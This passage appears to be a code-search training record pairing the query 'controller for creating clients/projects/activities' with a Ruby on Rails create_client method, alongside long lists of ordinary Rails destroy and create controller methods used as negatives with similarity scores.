activity=Assignment.find(c_delete_params[:assignment]).activity.id
Assignment.find(c_delete_params[:assignment]).destroy
flash[:notice]='Deleted assignment'
return redirect_to request.referer + '#activity'+activity.to_s
end
rescue
flash[:error]='There was an error'
redirect_to :back
end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def destroy\n @activities_project = ActivitiesProject.find(params[:id])\n @activities_project.destroy\n\n respond_to do |format|\n format.html { redirect_to(activities_projects_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @project = @client.projects.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to @client }\n end\n end",
"def destroy\n @project = @client.projects.find(params[:id])\n\n begin\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to(client_projects_url(@client), notice: 'Project was deleted.') }\n format.xml { head :ok }\n end\n rescue ActiveRecord::DeleteRestrictionError\n redirect_to client_project_url(@client, @project), notice: \"Delete was restricted.\"\n end\n end",
"def destroy\n @project.destroy\n respond_to do |format|\n activity = current_user.create_activity(@project, 'deleted')\n activity.user_id = current_user.id\n format.html { redirect_to dashboard_path, notice: 'Project was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n client_id = @project.client_id\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to client_projects_path(client_id), notice: \"成功删除#{Project.model_name.human}\" }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project_activity.destroy\n respond_to do |format|\n format.html { redirect_to project_activities_url, notice: 'Project activity was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = @projectable.projects.find(params[:id])\n @project.destroy\n track_activity @project\n\n respond_to do |format|\n format.html { redirect_to [@projectable, :projects] }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @cliente = @project.cliente\n @project.destroy\n respond_to do |format|\n format.html { redirect_to user_projects_url, notice: 'Proyecto borrado :(' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @activity = Activity.create(user_id: current_user.id, activity_type: 'Destroy', target_type: 'Project', target_id: @project.id)\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_url, notice: 'Project was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def delete\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to admin_path }\n format.json { head :no_content }\n end\n end",
"def destroy\n @activity.destroy\n respond_to do |format|\n format.html { redirect_to project_activities_url(@project), notice: 'Activity was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:project_id])\n if @project.nil? || @project.client.user != current_user\n respond_to do |format|\n format.html { redirect_to projects_path, :notice => \"Sorry, you don't have access to that project.\" }\n format.json { render :status => 404 }\n end\n end\n @task = Task.find(params[:id])\n @task.destroy\n\n respond_to do |format|\n format.html { redirect_to project_tasks_url(@project), :notice => \"Task was successfully deleted.\" }\n format.json { head :no_content }\n end\n end",
"def destroy\n @client = @entity.project.client\n @entity.destroy\n\n respond_to do |format|\n format.html { redirect_to(client_entities_url(@client), :notice => \"Entity was successfully destroyed. #{undo_link}\") }\n end\n end",
"def destroy\n @client = Client.find(params[:id])\n\n project_id = @client.project_id\n\n # Destroy all the client's posts\n clients_posts = Post.where(:user_id => @client.id)\n clients_posts.each do |post|\n post.destroy\n end\n\n @client.destroy\n\n respond_to do |format|\n format.html { redirect_to project_url(:id => project_id, :page => 'options') }\n format.json { head :no_content }\n end\n end",
"def destroy\n authorize @project\n @project.destroy\n render json: [\"Deleted successfully.\"], status: :ok\n end",
"def destroy\n @dev_activity.destroy\n respond_to do |format|\n format.html { redirect_to dev_activities_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = current_user.active_projects.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n Rails.logger.info \"We are deleting project\"\n @todo_project.destroy\n respond_to do |format|\n format.html { redirect_to todo_projects_url, notice: 'Project was successfully deleted.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @partner_project = PartnerProject.find(params[:id])\n @partner_project.destroy\n\n respond_to do |format|\n format.html { redirect_to partner_projects_url }\n format.json { head :no_content }\n end\n end",
"def delete\r\n\t\t\trender json: Project.delete_by_id(params[:id])\r\n\t\tend",
"def destroy\n @project.destroy\n respond_to do |format|\n format.html { redirect_to admin_projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @dashboard_project.destroy\n respond_to do |format|\n format.html { redirect_to dashboard_projects_url, notice: 'Project was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n authorize(@project)\n\n @project.destroy\n respond_to do |format|\n format.html do\n redirect_to projects_url,\n notice: t('removed')\n end\n format.json { head :no_content }\n end\n end",
"def destroy\n @project.destroy_all\n respond_to do |format|\n format.html { redirect_to projects_url, notice: 'The project was successfully removed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = current_user.projects.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project.destroy\n @projects = Project.all\n render :index\n end",
"def destroy\n # @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :ok }\n end\n end",
"def destroy\n authorize_action_for @project\n\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_url, notice: 'Project was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_url, notice: t('models.project.destroy') }\n format.json { head :no_content }\n end\n end",
"def destroy\n authorize! :delete, @project\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_url, notice: 'Project was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @projects_objetive.destroy\n respond_to do |format|\n format.html { redirect_to projects_objetives_url, notice: 'Projects objetive was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\t\t\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_url, notice: 'Successfully deleted project.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n #@project = Project.find(params[:id])\n #@project.destroy\n\n #respond_to do |format|\n # format.html { redirect_to(goals_url) }\n # format.xml { head :ok }\n #end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to administration_projects_path }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to admin_projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n authorize! :destroy, @project\n @project.destroy\n\n head :no_content\n end",
"def destroy\n # Delete tasks within project\n @project.tasks.each do |task|\n task.destroy\n end\n\n # Delete items and records within project\n @project.items.each do |item|\n item.records.each do |record|\n record.destroy\n end\n item.destroy\n end\n\n # Delete jobs within project\n @project.jobs.each do |job|\n job.destroy\n end\n\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_url, notice: 'Project was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.delete\n\n respond_to do |format|\n format.html { redirect_to request.referer }\n format.json { head :no_content }\n end\n end",
"def destroy\n @ourproject = Ourproject.find(params[:id])\n @ourproject.destroy\n\n respond_to do |format|\n format.html { redirect_to ourprojects_url }\n format.json { head :ok }\n end\n end",
"def destroy\n authorize_action_for @project\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_url, notice: 'Project was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Admin::Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to(admin_projects_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\r\n @project.destroy\r\n respond_to do |format|\r\n format.html { redirect_to projects_url }\r\n format.json { head :no_content }\r\n end\r\n end",
"def destroy\n @pat_project = Pat::Project.find(params[:id])\n @pat_project.destroy\n\n respond_to do |format|\n format.html { redirect_to(pat_projects_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n @project.users.delete_all\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n standard_destroy(Project, params[:id])\n end",
"def destroy\n authenticate_user!\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to(projects_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n \n @project = Project.find(params[:id])\n if @project.deleted == true\n @project.deleted = false\n else\n @project.deleted = true\n end\n @project.save\n\n respond_to do |format|\n format.html { redirect_to(projects_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n begin\n if @client_company.projects.present? || @client_company.users.present?\n respond_to do |format|\n format.js\n end\n else\n @client_company.destroy\n @destroy = true\n respond_to do |format|\n format.js\n end\n end\n rescue => e\n redirect_to projects_path, notice: 'Project can not deleted because it is linked with its assosiative records'\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n \n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @my_studio_client = MyStudio::Client.find(params[:id])\n @my_studio_client.destroy\n\n respond_to do |format|\n format.html { redirect_to my_studio_clients_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_url, notice: 'Proyecto eliminado sastifactoriamente' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @activity = current_user.activities.find(params[:id])\n @activity.destroy\n\n respond_to do |format|\n format.html { redirect_to activities_url }\n format.json { head :ok }\n end\n end",
"def destroy\n redirect_to index_project_path\n end",
"def destroy\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_url, notice: \"#{I18n.t 'project.project_destoy'}\"}\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n employee_projects = EmployeesProjects.find EmployeesProjects.search_by(project_id: @project.key)\n employee_projects.map &:destroy\n @project.destroy\n respond_to do |format|\n if Project.list.blank?\n format.html { redirect_to startup_projects_path }\n else\n format.html { redirect_to learn_projects_path }\n format.json { head :no_content }\n end\n end\n end",
"def destroy\n @project = Company.find(params[:company_id]).projects.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to(projects_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_path, notice: 'Project was successfully deleted.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to admin_projects_url }\n end\n end",
"def destroy\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_url, notice: 'Project was successfully deleted.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_url, notice: 'Project was successfully deleted.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n authorize Project\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_url, notice: 'Project was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.status = 'deleted'\n @project.save!\n\n respond_to do |format|\n format.json { render :json => \"success\" }\n end\n end",
"def destroy\n # @project = Project.find(params[:id])\n # @project.destroy\n\n respond_to do |format|\n format.html { redirect_to(projects_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_url, notice: 'Projeto deletado.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project.destroy\n respond_to do |format|\n format.html { redirect_to admin_url(:user_id => current_user.id), notice: 'Project was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to(projects_url) }\n format.json { head :ok }\n end\n end",
"def destroy\n @project.destroy\n respond_to do |format|\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @redirect_url = @project_component.project\n @project_component.destroy\n respond_to do |format|\n format.html { redirect_to project_path(@redirect_url), notice: 'Project component was successfully deleted.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project.destroy\n respond_to do |format|\n if current_user.admin?\n format.html { redirect_to projects_path , notice: 'Projekt bol vymazaný.' }\n else\n format.html { redirect_to root_path, notice: 'Projekt bol vymazaný.' }\n end\n format.json { head :no_content }\n end\n end",
"def destroy\n @project.destroy\n respond_to do |format|\n format.html { redirect_to projects_url, notice: 'Proyecto eliminado exitosamente.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to(admin_projects_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @project = Project.find(params[:id])\n @project.destroy\n\n respond_to do |format|\n format.html { redirect_to projects_url }\n format.json { head :no_content }\n end\n end"
] |
[
"0.76715904",
"0.7656154",
"0.7489624",
"0.7466021",
"0.73890996",
"0.7364872",
"0.7301424",
"0.7294843",
"0.72752523",
"0.7170535",
"0.7137682",
"0.71017635",
"0.7045573",
"0.7040628",
"0.70351183",
"0.7032084",
"0.70251167",
"0.7017299",
"0.70083606",
"0.69274914",
"0.6911249",
"0.69019353",
"0.69011253",
"0.6883217",
"0.6877864",
"0.68770045",
"0.6876002",
"0.687434",
"0.6867277",
"0.68671507",
"0.68663424",
"0.6864268",
"0.68619895",
"0.6860338",
"0.68584067",
"0.685626",
"0.68545616",
"0.68529993",
"0.68469137",
"0.6844313",
"0.6843131",
"0.6831729",
"0.68303293",
"0.6828387",
"0.68272823",
"0.68270814",
"0.6826333",
"0.68247026",
"0.6823201",
"0.68230414",
"0.68230414",
"0.68230414",
"0.68230414",
"0.68230414",
"0.6818864",
"0.6812108",
"0.68093264",
"0.6809275",
"0.6808724",
"0.68013036",
"0.6795289",
"0.67930484",
"0.67915314",
"0.67875737",
"0.6787364",
"0.6785122",
"0.67834246",
"0.67834246",
"0.6781191",
"0.6777963",
"0.6777861",
"0.67747664",
"0.6768208",
"0.675996",
"0.6756129",
"0.67547727",
"0.67547727",
"0.67547727",
"0.67547727",
"0.6751112",
"0.6750994",
"0.67468536",
"0.67467976",
"0.6746141",
"0.6746141",
"0.6746141",
"0.6746141",
"0.6746141",
"0.6746141",
"0.6746141",
"0.6746141",
"0.6746141",
"0.6746141",
"0.6746141",
"0.6746141",
"0.6746141",
"0.6746141",
"0.6746141",
"0.6746141",
"0.6746141"
] |
0.73521006
|
6
|
controller for creating clients/projects/activities
|
def create_client
begin
if create_params[:client]
Client.create(name: create_params[:client])
flash[:notice]='Client: '+create_params[:client]+', created! '
return redirect_to '/admin/list_clients'+'?client_name='+create_params[:client]
elsif create_params[:project]
Client.find(create_params[:parent_id]).projects.create(name: create_params[:project])
flash[:notice]='Project: '+create_params[:project]+', created! '
return redirect_to request.referer+'#project'+Project.find_by_name(create_params[:project]).id.to_s
elsif create_params[:activity]
Project.find(create_params[:parent_id]).activities.create(name: create_params[:activity])
flash[:notice]='Activity: '+create_params[:activity]+', created! '
return redirect_to request.referer+'#activity'+Activity.find_by_name(create_params[:activity]).id.to_s
elsif create_params[:user_id]
begin
Assignment.create!(user_id: create_params[:user_id], activity_id: create_params[:parent_id])
flash[:notice]='Assigned user '+User.find(create_params[:user_id]).handle+' to activity '+Activity.find(create_params[:parent_id]).name
return redirect_to request.referer+'#ass'+Assignment.where(user_id: create_params[:user_id], activity_id: create_params[:parent_id]).first.id.to_s
rescue
flash[:error]='You can only assign a user once to to a particular activity'
end
elsif create_params[:project_wide]
begin
Project.find(create_params[:parent_id]).activities.each do |activity|
Assignment.create!(user_id: create_params[:project_wide], activity_id: activity.id)
flash[:notice]='Assigned user '+User.find(create_params[:project_wide]).handle+' to all activities in project '+Project.find(create_params[:parent_id]).name
end
return redirect_to request.referer+'#project'+create_params[:parent_id].to_s
rescue
flash[:error]='You can only assign a user once to to a particular activity'
end
elsif create_params[:client_wide]
begin
Client.find(create_params[:parent_id]).activities.each do |activity|
Assignment.create!(user_id: create_params[:client_wide], activity_id: activity.id)
end
flash[:notice]='Assigned user '+User.find(create_params[:client_wide]).handle+' to all activities in client '+Client.find(create_params[:parent_id]).name
return redirect_to :back
rescue
flash[:error]='You can only assign a user once to to a particular activity'
end
end
return redirect_to :back
rescue
flash[:error]='There was an error'
redirect_to :back
end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def create\n @project = @client.projects.new(params[:project])\n\n respond_to do |format|\n if @project.save\n format.html { redirect_to @client, notice: 'Project was successfully created.' }\n else\n format.html { render action: \"new\" }\n end\n end\n end",
"def create\n @project = current_user.projects.build(project_params)\n @project.user_id = current_user.id\n if @project.user.admin?\n @project.state = \"accepted\"\n else\n @project.state = \"pending\"\n end\n\n respond_to do |format|\n if @project.save\n activity = current_user.create_activity(@project, 'created')\n activity.user_id = current_user.id\n format.html { redirect_to @project, notice: 'Project request was sent.' }\n format.json { render :show, status: :created, location: @project }\n else\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @activities_project = ActivitiesProject.new(params[:activities_project])\n\n respond_to do |format|\n if @activities_project.save\n format.html { redirect_to(@activities_project, :notice => 'Activities project was successfully created.') }\n format.xml { render :xml => @activities_project, :status => :created, :location => @activities_project }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @activities_project.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n client = params[:client].present? ? Client.new(params[:client]) : Client.find_by_id(params[:project].delete(:client_id))\n unless client.present?\n redirect_to projects_url, notice: \"Client is required.\" and return\n end\n \n @project = Project.new(params[:project])\n @project.client = client\n\n respond_to do |format|\n if @project.save\n Assignment.create({project_id: @project.id, user_id: current_user.id}.merge(params[:project][:assignment]))\n current_user.current_company.projects << @project\n current_user.current_company.clients << @project.client\n format.html { redirect_to @project, notice: 'Project was successfully created.' }\n format.json { render json: @project, status: :created, location: @project }\n else\n format.html { render action: \"new\" }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @client = Client.find(params[:client_id])\n @project = @client.projects.build(project_params)\n\n respond_to do |format|\n if @project.save\n format.html { redirect_to client_projects_path(@client), notice: 'Project was successfully created.' }\n format.json { render json: client_projects_path(@client), status: :created, location: @project }\n else\n format.html { render action: \"new\" }\n format.json { render json: client_projects_path(@client).errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project_activity = ProjectActivity.new(project_activity_params)\n\n respond_to do |format|\n if @project_activity.save\n format.html { redirect_to @project_activity, notice: 'Project activity was successfully created.' }\n format.json { render :show, status: :created, location: @project_activity }\n else\n format.html { render :new }\n format.json { render json: @project_activity.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = Project.new(params[:project])\n if @project.save\n redirect_to project_path(@project), notice: 'Project had been created successfully.'\n else\n find_people_list\n fetch_clients\n render action: \"new\"\n end\n end",
"def create\n @project = @projectable.projects.new(params[:project])\n\n respond_to do |format|\n if @project.save\n track_activity @project\n format.html { redirect_to [@projectable, @project], notice: 'Project was successfully created.' }\n format.json { render json: @project, status: :created, location: @project }\n else\n format.html { render layout: 'form', action: \"new\" }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = Project.new(project_params)\n\n if params[\"project\"][\"client_id\"] != \"\"\n @project.client = Client.find params[\"project\"][\"client_id\"]\n end\n\n respond_to do |format|\n if @project.save\n format.html { redirect_to @project, notice: 'Novo projeto cadastrado com sucesso.' }\n format.json { render :show, status: :created, location: @project }\n else\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = @client.projects.build(project_params)\n\n respond_to do |format|\n if @project.save\n format.html { redirect_to(client_projects_url(@client), notice: 'Project was successfully created.') }\n format.xml { render xml: @project, status: :created, location: @project }\n else\n format.html { render action: \"new\" }\n format.xml { render xml: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = current_user.projects.create(params[:project])\n \n if @project.save\n record_activity(\"created new project: \" + @project.id.to_s)\n redirect_to root_path, :notice => \"Project created successfully\"\n else\n render 'new'\n end\n end",
"def new\n @project = Project.new\n @project.client_id = params[:client_id]\n @project.created_by = current_user.id\n\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @project }\n end\n end",
"def create\n @project = Project.find(params[:project_id])\n if @project.nil? || @project.client.user != current_user\n respond_to do |format|\n format.html { redirect_to projects_path, :notice => \"Sorry, you don't have access to that project.\" }\n format.json { render :status => 404 }\n end\n end\n @task = Task.new(params[:task])\n @task.project = @project\n\n respond_to do |format|\n if @task.save\n format.html { redirect_to project_tasks_path(@project), :notice => 'Task was successfully created.' }\n format.json { render :json => @task, :status => :created, :location => @task }\n else\n format.html { render :action => \"new\" }\n format.json { render :json => @task.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def new\n @client = Client.find(params[:client_id])\n @project = @client.projects.build\n \n respond_with(@project)\n end",
"def create\n params[:project][:start_date] = DateTime.strptime(params[:project][:start_date], '%m/%d/%Y').strftime('%Y/%m/%d')\n params[:project][:end_date] = DateTime.strptime(params[:project][:end_date], '%m/%d/%Y').strftime('%Y/%m/%d')\n @project = Project.new(params[:project])\n\n respond_to do |format|\n if @project.save\n PublicActivity::Activity.create key: 'project.create', trackable: @project, company_id: @project.company_id, project_id: @project.id, owner: current_user\n format.html { redirect_to :back, notice: 'Project was successfully created.' }\n format.json { render json: @project, status: :created, location: @project }\n else\n format.html { render action: \"new\" }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def new\n @project = Project.new(user_id: current_user.id)\n find_people_list\n fetch_clients\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @project }\n end\n end",
"def create\n @urlroot = Designax::Application.config.urlroot\n if params[:pk] == \"new\" and params[:name] == \"project_name\"\n project_name = params[:value]\n @project = Project.new()\n @project.project_name = project_name\n else\n @project = Project.new(params[:project])\n end\n\n respond_to do |format|\n if @project.save\n redirect_url = @urlroot + \"/projects\"\n response_url = { \"url\" => redirect_url }\n format.json { render json: response_url, status: 200 }\n else\n format.html { render action: \"new\" }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def new_project\n if current_admin.present? || current_client.present?\n @project = Project.new\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @project }\n end\n else\n redirect_to new_admin_session_path and return\n end\n end",
"def create\r\n\t\t\t@project = params[:id].present? ? Project.find(params[:id]) : Project.new(create_step: 0)\r\n\t\t\t\r\n\t\t\t# Author\r\n\t\t\tif @project.new_record?\r\n\t\t\t\tauthorize! :create, @project\r\n\t\t\telse\r\n\t\t\t\tauthorize! :edit, @project\r\n\t\t\tend\r\n\r\n\t\t\trender layout: 'layout_back'\r\n\t\tend",
"def create\n @project = Project.new(params[:project])\n #@project.assigned_users << current_user\n @project.updated_by = current_user.id\n respond_to do |format|\n if @project.valid1? and @project.save\n format.html { redirect_to client_projects_path(client_id: @project.client_id), notice: \"成功创建#{Project.model_name.human}\" }\n format.json { render json: @project, status: :created, location: @project }\n else\n format.html { render action: \"new\" }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = Project.new(params[:project])\n @project.type = params[:type][:id]\n @project.access = \"Private\"\n @user_name = params[:username]\n \n @user = current_user.luser\n @project.created_by = @user.name\n role = Role.find(:first, :conditions => {:name => \"Creator\"} )\n\n respond_to do |format|\n if @project.save\n luser_project = LuserProject.new \n luser_project.project_id = @project.id\n luser_project.luser_id = @user.id\n luser_project.role_id = role.id\n luser_project.save\n Activity.created_project(current_user.luser, @project)\n \n format.html { redirect_to project_url(@user_name, @project), notice: 'Project was successfully created.' }\n format.json { render json: @project, status: :created}\n else\n format.html { render action: \"new\" }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @project = Project.new(params[:project])\n\n respond_to do |format|\n if @project.client && @project.save\n\n pm = ProjectParticipant.with_deleted.find_or_initialize_by(project_id: @project.id, user_id: current_user.id)\n pm.is_manager = true\n pm.restore! if pm.destroyed?\n pm.save\n\n format.html { redirect_to \"/\", notice: 'Project was successfully created.' }\n format.json { render json: @project.as_json(:include => [:client, :project_participants ]), status: :created, location: @project }\n else\n format.html { render action: \"new\" }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n cmp = AzCompany.find(params[:az_project][:owner_id])\n @project = AzProject.create(params[:az_project][:name], cmp, current_user, params[:az_project][:public_access])\n\n @title = 'Создание нового сайта'\n\n respond_to do |format|\n if @project.id\n flash[:notice] = 'Проект успешно создан.'\n format.html { redirect_to(@project) }\n else\n format.html { render :template => 'az_projects/new', :owner_id => cmp.id }\n end\n end\n end",
"def create \n\t\t@project = Project.new(project_params)\n\t\t@project.creator = current_user.id\n\n respond_to do |format|\n if @project.save\n format.html { redirect_to @project, notice: 'Project was successfully created.' }\n format.json { render :show, status: :created, location: @project }\n else\n format.html { render :new }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @campaign = Campaign.find(params[:campaign_id])\n @project = @campaign.projects.create(params[:project])\n respond_to do |format|\n if @project.update_attributes(params[:project])\n format.html { redirect_to campaign_path(@campaign), notice: 'Project was successfully created.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @project.errors, status: :unprocessable_entity }\n end\n end\n end",
